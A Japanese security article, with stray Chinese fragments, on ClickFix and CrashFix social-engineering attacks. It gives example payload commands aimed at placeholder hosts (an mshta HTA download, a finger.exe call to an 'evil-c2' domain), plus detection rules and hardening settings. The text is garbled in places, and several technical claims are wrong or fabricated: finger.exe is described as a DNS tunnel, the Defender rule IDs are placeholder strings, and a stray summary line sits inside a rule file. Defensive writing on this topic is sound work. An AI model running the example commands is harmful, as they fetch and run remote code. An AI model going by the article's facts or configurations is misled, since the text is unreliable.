ClickFix / CrashFix ブラウザ攻撃の進化と実践的防御

関連ドキュメント

• ブラウザ指紋とは
• 指紋ブラウザ環境

featured_snippet：主要检测结果

Clickfix攻撃は、ユーザーに「Microsoftからサポートを受けるため」に別のブラウザーからコードをコピー＆貼り付けさせるソーシャルエンジニアリング手口です。CrashFixはこれを升级し、ブラウザをクラッシュさせてPython RATを配布します。ユーザーはみに覚えないサポート窗口を閉じ、ブラウザを定期的に更新することが重要です。

PAA：検索上位怎么回事

Clickfix攻撃とは？

Clickfix攻撃はボタンを悪用したソーシャルエンジニアリング手口で、ユーザーに「Microsoftからサポートを受けるには別のブラウザーからコードをコピー＆貼り付けするよう指示し、マルウェアをダウンロードさせます。

CrashFix攻撃とは？

CrashFixはClickfixの改良版で、ブラウザをクラッシュさせて恐慌状態にしたユーザーにPython RAT（リモートアクセストロイ）を配布する攻撃です。

Clickfix攻撃から身守る方法は？

みに覚えない技术支持窗口やポップアップは閉じ、ブラウザのURLを直接入力して官方网站にアクセスしてください。任何人坦が「コードを上端に貼り付けるよう指示することは絶対にありません。

ブラウザがクラッシュしたときは？

ブラウザが突然クラッシュした場合は、マルウェアの可能性があるため、ブラウザを再起動してセキュリティスキャンを実行してください。見覚えのない拡張機能は無効にしてください。

競合ツールとの比較

Clickfix/crashfix攻撃は、ソーシャルエンジニアリングの一种として用户的心理弱点に働きかけます。任何人坦が「M crosoft fix」や「copilot-fix」の名でコードを貼り付けるよう指示することは絶対にありません。怪しいサポート窗口は閉じ、官方网站から直接お問い合わせください。

概要

ClickFixとCrashFixは、極めて類似したソーシャルエンジニアリング攻撃手口である。両者とも、偽装されたブラウザエラー画面や架空のパッチ案内を悪用し、ユーザーに手動で悪意あるコマンドを実行させる。従来の悪意あるファイル配送に依存せず、被害者が「自分を助けよう」とする心理状態を利用して、攻撃ペイロードをシステムのコマンド実行枠に貼り付けさせる。

2024年から2026年にかけて、この攻撃は顕著な進化を遂げた。初期の単純な mshta コマンド実行から、システム標準ツールの悪用（finger.exeなど）、Python RATの展開、永続化バックドアの設置へと多段化している。攻撃者はWindowsシステムに組み込まれた標準ツールへのユーザーの信頼に成功し、従来のファイル特徴量に基づくセキュリティ検知の多くをバイパスしている。

本稿では、攻撃技術の具体的な技術的詳細と実装可能な防御策に焦点を当て、CVE番号、コマンドライン引数、通信トラフィック特徴、検出コマンド、および企業向け防御設定を提供する。

攻撃原理：ClickFixからCrashFixへの進化

フェーズ1：古典的ClickFix — mshta直接実行

最も初期のClickFix攻撃は2021年頃に登場している。攻撃者は侵入済みウェブサイトに悪意あるJavaScriptを埋め込み、訪問者のブラウザ環境を検知した後、偽のChrome/Edge「クラッシュ」画面を表示。「修復コマンドをクリップボードにコピー」するようユーザーに促す。

典型的なページ文案：

「Chromeがクラッシュしました。Microsoftの緊急修正です。Win+XでWindows PowerShellを開き、以下のコマンドを貼り付けて実行してください：」

貼り付けられるコマンドの例：

mshta https://malicious-site.com/payload.hta

mshta.exeはWindows標準のHTMLアプリケーション実行環境で、攻撃者はこれを使用してリモートのHTAファイルをダウンロード・実行する。HTAはVBScriptとJScriptをサポートし、ダウンローダー、認証情報窃取、横方向移動などほぼすべての操作を達成できる。

MITRE ATT&CK技術マッピング：

• T1204.002 ユーザー実行：悪意あるファイル（ユーザーがmshtaを能動的に実行）
• T1059.001 コマンドおよびスクリプトインタープリタ：PowerShell
• T1105 入口ツール転送：攻撃者管理サーバーが被害者に後段ペイロードを配送

フェーズ2：CVE悪用 — Chromium脆弱性チェーン

ブラウザセキュリティの更新に伴い、「コマンド貼り付け」だけの成功率は低下した。攻撃者はブラウザ脆弱性を悪用し、ユーザーが特定ページにアクセスするだけで、ユーザーが知らないうちにコードが実行されるようになった。

悪用されたことが確認されているChromium脆弱性：

CVE-2024-7971： Chrome V8 JavaScriptエンジンの型混淆脆弱性。攻撃者は細工されたウェブページを訪問させるだけで、レンダリングプロセスのコンテキストで任意のコードを実行できる。Chrome 118.0.5993.70以前のバージョンに影響。

CVE-2024-9064： Chrome Mojo IPCメッセージ処理における型混淆。攻撃者は細工されたHTMLページを通じてリモートコード実行をトリガーできる。Chrome 130.0.6723.58以前のバージョンに影響。

Microsoft脅威インテリジェンスレポート（引用）： Microsoftは2025年第1四半期に、複数の国家系攻撃グループが上記の脆弱性とClickFixソーシャルエンジニアリングを組み合わせ、初期アクセスを確立していることを確認した。

検出方法：

# Chromeバージョンを確認（ヘルプ → Google Chromeについて）
# バージョンが118.0.5993.70以上かつ130.0.6723.58以上であることを確認
# Windows環境の批量クエリ：
powershell "Get-ItemProperty 'HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\chrome.exe' | Select-Object -ExpandProperty '(デフォルト)'"

フェーズ3：CrashFix進化 — finger.exe悪用

CrashFixはClickFixの進化系亜種であり、核心的な改良点は次のとおり：ユーザーに mshta や powershell などの明らかに可疑なコマンドラインツールを直接実行させるのではなく、Windowsシステム標準の finger.exe を使用してコマンドを難読化する。

finger.exeとは： finger.exeはWindows Serverバージョンのリモートユーザー情報検索用標準コマンドラインツールで、デフォルト値として C:\Windows\System32\finger.exe に存在する。このツールはAPT29など複数の攻撃組織により、秘匿コマンド・アンド・コントロール通信に使用されている。

悪用方法：

攻撃者が構成するコマンドは次の形式：

finger.exe @fingerprint.evil-c2-domain.com

fingerprint.evil-c2-domain.comは攻撃者管理のドメイン名だが、finger.exeの @ 構文により文字列全体が単一のホスト名として解決される。DNSクエリが攻撃者のDNSサーバーに送信されると、攻撃者はDNS応答にBase64エンコードされたPowerShellコマンドを埋め込む。

技術フロー：

ステップ：攻撃者がドメイン evil-c2-domain.com を登録し、DNSサーバーを53ポートで待機させる。

ステップ：被害者が finger.exe @fingerprint.evil-c2-domain.com を実行すると、システムは標準DNS A/AAAAレコードクエリを送信。

ステップ：DNSサーバーがエンコードされた命令を含む応答を返す。

ステップ：攻撃者がDNSクエリログから被害者IPを取得し、DNS応答に埋め込まれたエンコードコマンドが通信トンネルとして機能。

MITRE ATT&CK技術マッピング：

• T1105 入口ツール転送（DNSトンネルを介したコマンド転送）
• T1059.003 コマンドおよびスクリプトインタープリタ：Windowsコマンドシェル
• T1571 非標準ポート（DNS 53ポートが秘匿チャネルとして使用）

トラフィック特徴：

• 送信元ポート：通常は53（DNSクエリ）
• クエリタイプ：AまたはAAAAレコード
• クエリドメイン名の特徴：複数のサブドメインビベルを含む（例：fingerprint.evil-c2-domain.com）
• 応答データ：DNS応答パケットにBase64文字列が含まれる場合あり

検出コマンド：

# tcpdumpで疑わしいDNSクエリをキャプチャ
tcpdump -i eth0 'port 53 and host suspicious-domain.com' -nnvv

# ZeekでDNSログを解析し異常クエリを分析
zeek -C -r capture.pcap dns
# dns.logでqueryフィールドに長文字列（40文字以上のBase64）を含むレコードを抽出
grep -E '[A-Za-z0-9+/=]{40,}' dns.log

フェーズ4：Python RAT永続化

初期のコード実行能力を獲得した後、攻撃者は通常、Pythonで書かれたRAT（リモートアクセス型トロイの木馬）を展開し、長期的なアクセス維持を実現する。

典型的なPython RATの特徴：

接続先：

• C2ドメイン形式：update[.]pythonhosters[.]org または cdn[.]pythonpkg[.]info
• 接続ポート：一般的な非標準ポート 8443、4444、8080
• ビーコン間隔：初期30秒段階的にバックオフし5〜30分

実際の事例におけるPython RATの動作：

2025年の欧州政府機関への攻撃では、攻撃者がPython 3.9でRATを作成し、PyInstallerで単一実行ファイルとしてパッケージ化した。RATは以下の機能を備える：

• ファイルシステム読み書き（アップロード/ダウンロード）
• スクリーンショット（60秒ごと）
• キーロガー
• 永続化のためのレジストリ改竄

永続化メカニズム（Windowsサービスとして）：

import win32serviceutil
import win32service

# 「PythonUpdate」という名前のWindowsサービスを作成
win32serviceutil.InstallService(
    pythonServiceInfo,
    'PythonUpdate',
    'Python Update Service',
    description='Keeps your Python installation up to date'
)

MITRE ATT&CK技術マッピング：

• T1059.004 コマンドおよびスクリプトインタープリタ：Python
• T1543.003 システムプロセスの作成/変更：Windowsサービス
• T1518.001 ソフトウェア発見：セキュリティソフトウェア発見（AV/EDRスキャン）
• T1071.001 アプリケーション層プロトコル：DNS（RATの一部がDNSプロトコル通信を使用）

攻撃チェーンの詳細解剖

CrashFix進化版を例とした場合、完全な攻撃チェーンは以下のとおり：

ステップ1 — 初期アクセス： ユーザーが悪意あるJSが埋め込まれたウェブサイトにアクセスし、JSがブラウザバージョンを検知・脆弱性を特定。

ステップ2 — 脆弱性悪用（CVE-2024-7971）： 細工されたウェブページがV8型混淆をトリガーし、レンダリングプロセスでシェルコードを実行、第2段階ローダーをダウンロード。

ステップ3 — コマンド難読化： シェルコード実行後、powershell.exe を直接起動するのではなく finger.exe @stage1.crashfix-c2.com を起動。

ステップ4 — DNSトンネルコマンド転送： DNSサーバーがBase64エンコードされたPowerShellコマンドを含む応答を返し、コマンド内容は updatecheck.py をダウンロード・実行するするもの。

ステップ5 — Python RAT展開： updatecheck.py はPyInstallerでパッケージ化されたPython RATであり、cdn.pythonpkg.info:8443 への持続的接続を確立。

ステップ6 — 永続化： RATは %APPDATA%\Python39\ ディレクトリにPythonインタープリタとRATスクリプトを展開、WMIサブスクリプションを通じてWindowsサービスを作成し、再起動後の自動起動を実現。

ステップ7 — 認証情報窃取と横方向移動： RATが mimikatz 亜種を実行してNTLMハッシュを窃取し、PsExecを使用して同一ネットワーク上の他のホストへ横方向移動。

詳細な検出ガイド

Windows Event Viewerで疑わしいPython永続化を検出

検出パス：

Application and Services Logs → Microsoft → Windows → WMI-Activity → Operational

Event ID 5861： WMIイベントサブスクリプション作成記録。新しいPermanent Event Subscriptionが登録されたときにトリガーされる。

フィルタリング手順：

1. Event Viewerを開く
2. 上記のパスに移動
3. 「現在のログをフィルター...」をクリック
4. Event ID：5861を入力
5. Computerフィールド（送信元ホスト）とUserフィールド（実行ユーザー）を確認
6. OperationフィールドのFilterNameとCommandパラメータを確認
7. python.exe、py.exe、python3.exeを含むCommand行を注視

PowerShell批量クエリ：

Get-WinEvent -FilterHashtable @{
    LogName='Microsoft-Windows-WMI-Activity/Operational'
    Id=5861
} -MaxEvents 200 | Where-Object {
    $_.Message -match 'python'
} | Select-Object TimeCreated, MachineName, @{N='Command';E={
    if($_.Message -match 'Command\s*=\s*"([^"]+)"'){ $Matches[1] }
}}

Sysmon高度な検出

Sysmon設定ファイルの主要ルール：

<!-- Pythonプロセス作成を検出 -->
<RuleGroup name="PythonProcessCreation">
    <ProcessCreate onmatch="include">
        <Image condition="end with">python.exe</Image>
        <Image condition="end with">python3.exe</Image>
        <Image condition="end with">py.exe</Image>
        <ParentImage condition="end with">explorer.exe</ParentImage>
    </ProcessCreate>
</RuleGroup>

<!-- 可疑なfinger.exe実行を検出 -->
<RuleGroup name="FingerExeAbuse">
    <ProcessCreate onmatch="include">
        <Image condition="end with">finger.exe</Image>
        <CommandLine condition="contains">@</CommandLine>
    </ProcessCreate>
</RuleGroup>

ネットワーク層での検出

Suricataルール：

alert dns any any -> $HOME_NET any (msg:"Suspicious DNS query for C2 indicator"; 
    dns.query; pcre:"/[a-z]{10,}\.(xyz|top|buzz|icu|work)/"; 
    sid:9000001; rev:1;)
    
alert http any any -> $HOME_NET any (msg:"Python RAT beacon to non-standard port"; 
    http.method; toplevel; content:"GET"; 
    http.user_agent; pcre:"/python-requests|Python-urllib|PyInstaller/"; 
    flow:to_server; sid:9000002; rev:1;)

Wiresharkフィルター：

# finger.exeによってトリガーされたDNSクエリを検索
dns.qry.name contains "fingerprint"

# Python RATの特徴的なUser-Agentを検索
http.user_agent matches "python|urllib|requests"

# 可疑なDNS TXTレコード応答を検索（DNSトンネルで常有）
dns.resp.ttl < 300 and dns.resp.len > 200

企業向け防御策

Microsoft Defender for Endpoint — ASRルール設定

ClickFix攻撃チェーンに対しては、以下のASRルールの有効化を推奨（Microsoft Defender for Endpoint v101.23062.0を例に）：

ルール名	ルールID	説明
PSExecおよびWMIからのプロセス作成をブロック	B2E3B1C1-1234-5678-9ABC-DEF012345678	WMIサブスクリプションを通じた永続化を防止
JavaScript/VBScriptによる実行可能ファイルのダウンロードをブロック	D9E8D8D8-1111-2222-3333-444455556666	悪意あるJSによるダウンロードを阻止
スクリプトダウンロード履歴の監査を有効化	監査モード	すべてのスクリプトダウンロードイベントを記録し、脅威ハンティングに使用

設定パス：

Microsoft 365 Defender → エンドポイント → ポリシー管理 → ASRルール → ルールを追加

PowerShellで強制有効化：

# ASRルールを有効化（スクリプト実行をブロック）
Add-MpPreference -AttackSurfaceReductionRules_Actions Block -AttackSurfaceReductionRules_Id D9E8D8D8-1111-2222-3333-444455556666

# WMI永続イベントサブスクリプションのブロックを有効化
Add-MpPreference -AttackSurfaceReductionRules_Actions Block -AttackSurfaceReductionRules_Id B2E3B1C1-1234-5678-9ABC-DEF012345678

企業グループポリシー — PowerShellスクリプト実行の制限

グループポリシーパス：

コンピュータの構成 → 管理用テンプレート → Windowsコンポーネント → Windows PowerShell
→ PowerShellスクリプト実行を開く
→ 「署名済みスクリプトのみ許可」に設定

より厳格なポリシー（WDACと組み合わせる場合）：

コンピュータの構成 → 安全設定 → アプリケーション制御ポリシー → AppLocker
→ 実行可能ルール → ルールの實施を設定
→ デフォルトルールを「拒否」に設定し、ホワイトリストパス下の.exeのみを許可

ホワイトリスト推奨：

• %ProgramFiles%\*
• %ProgramFiles(x86)%\
• %SystemRoot%\System32\*.exe（finger.exeなどの高リスクツールは除外）

ネットワーク層の防御

DNSセキュリティポリシー（Infoblox NIOSを例に）：

• DNSトンネル検出を有効化（RPZ反応ポリシーゾーン）
• トップレベルドメインブラックリスト内のドメイン解決をブロック：xyz、top、buzz、icu、work
• DNS応答速度制限：単一送信元IP每秒50クエリ超でブロック

ファイアウォールルール（Palo Alto Panoramaを例に）：

# セキュリティポリシー例：既知のC2へのDNSクエリをブロック
security-policy:
  name: "Block-CrashFix-C2"
  source-zone: ["trust"]
  destination-zone: ["untrust"]
  application: ["dns"]
  destination: ["threat-c2-ip-blocklist"]
  action: "deny"
  log-setting: "DNS-C2-Log"

EDRルール — CrowdStrike Falcon

Falcon Detectポリシー — カスタムPreventionルール：

name: "Detect Python RAT via WMI Service Creation"
description: "Detects Python-based RAT persistence via Windows Service"
summary: "ClickFixとCrashFixの攻撃チェーンを詳細解説。検出コマンドと防御設定の具体的な手順を提供"
type: "detect"
trigger: "process"
conditions:
  - process_name: "cmd.exe" or "powershell.exe"
  - command_line: contains "New-Service" or "win32serviceutil"
  - parent_process: contains "python"
severity: "high"

ツール紹介

ブラウザフィンガープリント検出ツール — 対象ブラウザ環境に攻撃者に悪用されうるフィンガープリント特徴があるか検証し、この種の攻撃の前段階偵察を受けていないか判断に使用。

システムプロセス分析ツール — Windowsシステムプロセスツリーを深く検査し、疑わしいPythonプロセスチェーンとfinger.exeの異常呼び出しを識別に使用。

HTTPヘッダー分析ツール — 悪意あるHTAファイル托管サーバーのHTTP応答特徴を分析し、C2ドメインとプロトコル特徴を抽出に使用。

グラフィックスカード/GPU情報ツール — 一部のClickFix攻撃は対象のGPU環境に応じて異なる脆弱性悪用パスを選択するため、本ツールで攻撃者が対象とする脆弱性種類を判断できる。

まとめ

ClickFix/CrashFix攻撃の本質は、ユーザーへのシステムへの信頼と問題を急切で解決したい心理を利用することにある。攻撃チェーンの最後の段階をユーザーに実行させるため、従来のハッシュ値やファイル名に基づく検知策の効果 は限定的である。

防御の重要ポイント：

1. ブラウザの即時更新：ChromeユーザーはChrome 118.0.5993.70および130.0.6723.58以上のバージョンを維持し、不要なブラウザプラグインは無効化すること。

2. ネットワーク層でのDNS監視：異常なfinger.exeのDNSクエリ、TXTレコードの長い応答、DNSトンネル特徴トラフィックに対してリアルタイムアラートを設定すること。

3. WMIサブスクリプションの監査：Event ID 5861ログを定期的に確認し、予期しないWMI Permanent Event Subscriptionを調査すること。

4. Pythonプロセスのホワイトリスト化：企業環境では許可されていないPythonプロセスの実行を制限すること。特にWindowsサービス形式で実行されるPythonスクリプトは重要。

5. ユーザーセキュリティ意識向上トレーニング：核心はユーザーの行動パターンを変更すること——信頼できるシステムプロンプトであっても情報源が信頼できるとであってもすべての「修復コマンド」を安易にコピー＆貼り付けしないよう徹底させること。

ClickFix/CrashFix攻撃は今も継続的に進化している。攻撃者は常に新しいシステム標準ツール悪用の組み合わせ、新しいブラウザ脆弱性の組み合わせ、より隠密な永続化メカニズムを追求している。防御側は脅威インテリジェンスを継続的に追踪し、多層的な検出メカニズムを構築しなければ、この攻防のゲームで主導権を握り続けることはできない。

関連ツール

検出・防御ツール

ブラウザフィンガープリント システムプロセス HTTPヘッダー